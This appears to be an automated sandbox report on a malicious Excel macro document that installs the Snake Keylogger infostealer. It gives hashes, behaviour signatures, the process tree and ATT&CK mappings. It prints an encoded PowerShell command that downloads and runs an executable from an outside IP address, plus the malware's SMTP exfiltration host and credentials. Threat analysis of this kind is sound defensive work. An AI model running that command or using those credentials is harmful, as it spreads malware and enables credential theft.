Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    21-10-2021 05:55

General

  • Target

    delivery noticefNQSE5.xlsm

  • Size

    389KB

  • MD5

    cf4c3f1e0953167d484fb25ac961db42

  • SHA1

    d946a7e52728e50d6013a65bc0eb008b42b83787

  • SHA256

    81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b

  • SHA512

    d83bbff65e3d4d005b405c15708fb41967049ea7dcb059db2ea4b9b4f82a96c490088a91928f85640942ed37a7ff07e5d6391d98ad2c714bb9ab9db2a1331a8e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://3.64.251.139/vr/r/QA4ty2uUkTCD2tfNQSE5.exe

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.efinancet.shop
  • Port:
    587
  • Username:
    techvalley@efinancet.shop
  • Password:
    EmeN]m^8=-oI

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\delivery noticefNQSE5.xlsm"
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Qtkkhrqfym.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:576
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBRAHgAdwBoAGgAdwB4AHoAdABhAHQAYwB6AHIAaQBtAGQAdAAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADMALgA2ADQALgAyADUAMQAuADEAMwA5AC8AdgByAC8AcgAvAFEAQQA0AHQAeQAyAHUAVQBrAFQAQwBEADIAdABmAE4AUQBTAEUANQAuAGUAeABlACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1972
        • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
          "C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1256
          • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            5⤵
            • Executes dropped EXE
            PID:1752
          • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            5⤵
            • Executes dropped EXE
            PID:1740
          • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1624

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

2
T1112

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Collection

Data from Local System

3
T1005

Email Collection

1
T1114

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\Documents\Qtkkhrqfym.bat
    MD5

    57cc9b0d215088ba8b5d63024605da81

    SHA1

    cdc02772f2d7ecacbb86ad63e67b1726b36eafc6

    SHA256

    ea7db683263f7447dec974e52fe719b6ed0db751e122d53f57cdd0482d644f70

    SHA512

    bc087ab0e497686213f9a2a03a447009a798936ee8d80d4f652edf8974e0940a20445db82802581acf3b7865c8a00013173f55db365daf2aa31c28bd43bf04e3

  • \Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • \Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • \Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • \Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • memory/576-56-0x0000000000000000-mapping.dmp
  • memory/1256-71-0x00000000006B0000-0x00000000006C8000-memory.dmp
    Filesize

    96KB

  • memory/1256-64-0x0000000000000000-mapping.dmp
  • memory/1256-67-0x0000000001170000-0x0000000001171000-memory.dmp
    Filesize

    4KB

  • memory/1256-69-0x0000000000670000-0x00000000006A5000-memory.dmp
    Filesize

    212KB

  • memory/1256-70-0x0000000004A80000-0x0000000004A81000-memory.dmp
    Filesize

    4KB

  • memory/1624-78-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

  • memory/1624-79-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

  • memory/1624-87-0x00000000049C0000-0x00000000049C1000-memory.dmp
    Filesize

    4KB

  • memory/1624-85-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

  • memory/1624-82-0x00000000004203FE-mapping.dmp
  • memory/1624-81-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

  • memory/1624-77-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

  • memory/1624-80-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

  • memory/1768-54-0x0000000071731000-0x0000000071733000-memory.dmp
    Filesize

    8KB

  • memory/1768-53-0x000000002F3E1000-0x000000002F3E4000-memory.dmp
    Filesize

    12KB

  • memory/1768-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1768-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1972-58-0x0000000000000000-mapping.dmp
  • memory/1972-59-0x0000000075821000-0x0000000075823000-memory.dmp
    Filesize

    8KB

  • memory/1972-62-0x0000000002320000-0x0000000002F6A000-memory.dmp
    Filesize

    12.3MB

  • memory/1972-60-0x0000000002320000-0x0000000002F6A000-memory.dmp
    Filesize

    12.3MB

  • memory/1972-61-0x0000000002320000-0x0000000002F6A000-memory.dmp
    Filesize

    12.3MB